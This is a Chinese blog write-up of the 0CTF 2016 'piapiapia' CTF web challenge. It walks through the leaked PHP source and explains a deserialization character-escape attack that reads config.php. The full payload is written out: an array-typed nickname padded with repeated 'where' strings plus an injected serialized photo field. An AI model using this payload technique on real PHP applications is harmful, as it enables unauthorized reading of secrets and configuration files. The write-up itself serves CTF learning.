[0CTF 2016]piapiapia

最新推荐文章于 2024-06-20 22:09:50 发布
原创 最新推荐文章于 2024-06-20 22:09:50 发布 · 398 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #web安全 #安全

本文详细解析了0CTF2016中piapiapia题目的解题过程,通过利用PHP的序列化与反序列化特性,结合正则表达式的弱点,成功获取了隐藏在config.php文件中的flag。

[0CTF 2016]piapiapia

打开题目在这里插入图片描述什么也没有,扫描一下,扫目录可以扫到源码,www.zip解压后在这里插入图片描述在config.php里看见了flag,但不可读

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

upload.php

require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {

可以看出这里用了一堆正则表达式来过滤我们提交的数据,而且第三个正则表达式和前面两个不一样,这里判断了nickname是否为字符还有长度是否超过10。用文章开头的知识点二,如果我们传入的nickname是一个数组,绕过长度的限制,则可以绕过这正则表达式,是我们不会die出。
  在代码的后面调用update_profile处我们想到这个可能是将数据保存到数据库,而且还用了php序列化serialize(),我们可以大胆的尝试用反序列化漏洞来搞一下。
  我们再看看update_profile()到底是个啥,使用全局搜索我们在class.php中看到了定义的update_profile()方法

  public function update_profile($username, $new_profile) {
	$username = parent::filter($username);
	$new_profile = parent::filter($new_profile);

	$where = "username = '$username'";
	return parent::update($this->table, 'profile', $new_profile, $where);
}

我们再继续追寻下去
filter()

public function filter($string) {
	$escape = array('\'', '\\\\');
	$escape = '/' . implode('|', $escape) . '/';
	$string = preg_replace($escape, '_', $string);

	$safe = array('select', 'insert', 'update', 'delete', 'where');
	$safe = '/' . implode('|', $safe) . '/i';
	return preg_replace($safe, 'hacker', $string);
}

update()

public function update($table, $key, $value, $where) {
	$sql = "UPDATE $table SET $key = '$value' WHERE $where";
	return mysql_query($sql);
}

update.php我们基本上就搞清楚了,是先经过正则表达式将用户提交的参数值过滤,然后序列化,然后将非法的值替换为’hacker’
然后我们再看profile.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

我们可以看到这里有反序列化还有文件读取,flag在config.php中,而且有序列化,过滤替换,反序列化,文件读取,我们构造包含config.php的数据,利用字符串逃逸,在profile.php中读取出来
  反序列化字符逃逸
  有个问题,我们反序列化字符逃逸,首先序列化的字符是可控的,还有前面的长度是可控的。但update.php将参数序列化,我们可控变量的长度就已经写死了,怎么才能去控制呢?

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

这里就是突破口,我们可以写入where替换成hacker之后字符串实际的长度就+1,因此实际的长度大于序列化固定的长度(变量前面‘s’里的值)。利用反序列化字符串逃逸,反序列化时只能将字符串中nickname前面的s后面长度的字符串反序列化成功,这个是传参的时候就固定好了。剩下的字符串我们构造成class.php因为里面包含了flag,并且让他在photo位置上,然后把photo给扔掉,这样在profile.php中读取的photo就是我们构造的config.php了,也就是读取到了flag
  简单说就是利用后端的函数替换,导致实际长度增加,增加的部分(config.php)被挤了出来,到了photo的位置上,然后闭合。
  思路有了,开始做题,先注册一个用户在这里插入图片描述登陆过后直接是更新,
  在这里插入图片描述
这一步抓个包修改nickname为nickname[],数组绕过长度检测,然后修改nickname的值为wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
在这里插入图片描述将修改后的数据包发送回服务器,在这里插入图片描述得到base64加密值,解密得到flag在这里插入图片描述

[0CTF-2016] piapiapia
Logerrik的博客
05-11 615
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
[0CTF 2016]piapiapia 1
最新发布
ubaichu的博客
07-16 1350
[0CTF 2016]piapiapia 1 思路及详细解题过程
[0CTF 2016]piapiapia1
alwtj的博客
06-20 1025
于是我又盯上了photo前面的nickname, 由于我们传入的参数是经过序列化之后的,所以我们可以通过序列化的键值对逃逸来完成它.那么,此时我们的数组长度为39除了 where 多了34 位,我们要想办法把那 34 位去掉,这个时候就用到了filter.所以我们的思路就是通过file_get_contents()这个函数获取,config.php里的内容~那么我们就明白了,我们需要使查询的内容中对用的 photo 的内容为config.php.既然知道了要查询到的内容,那么就找地方该插入数据了.
[0ctf2016]piapiapia
ro4lsc的博客
05-07 7278
[0ctf2016]piapiapia(PHP unserialize字符逃逸) 前言 由于自己还没接触过太多这类的题目,所以还是总结网上的WP进行复现,会尽可能写的清晰,那么话不多说,开始淦 首先使用了dirsearch扫了一下目录(网站源码泄漏www.zip) dirsearch -u "http://62bfe127-e775-4795-bf16-8cc039c1e9ab.node3.buu...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
[0CTF 2016]piapiapia(反序列化逃逸)
paidx0
09-02 850
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值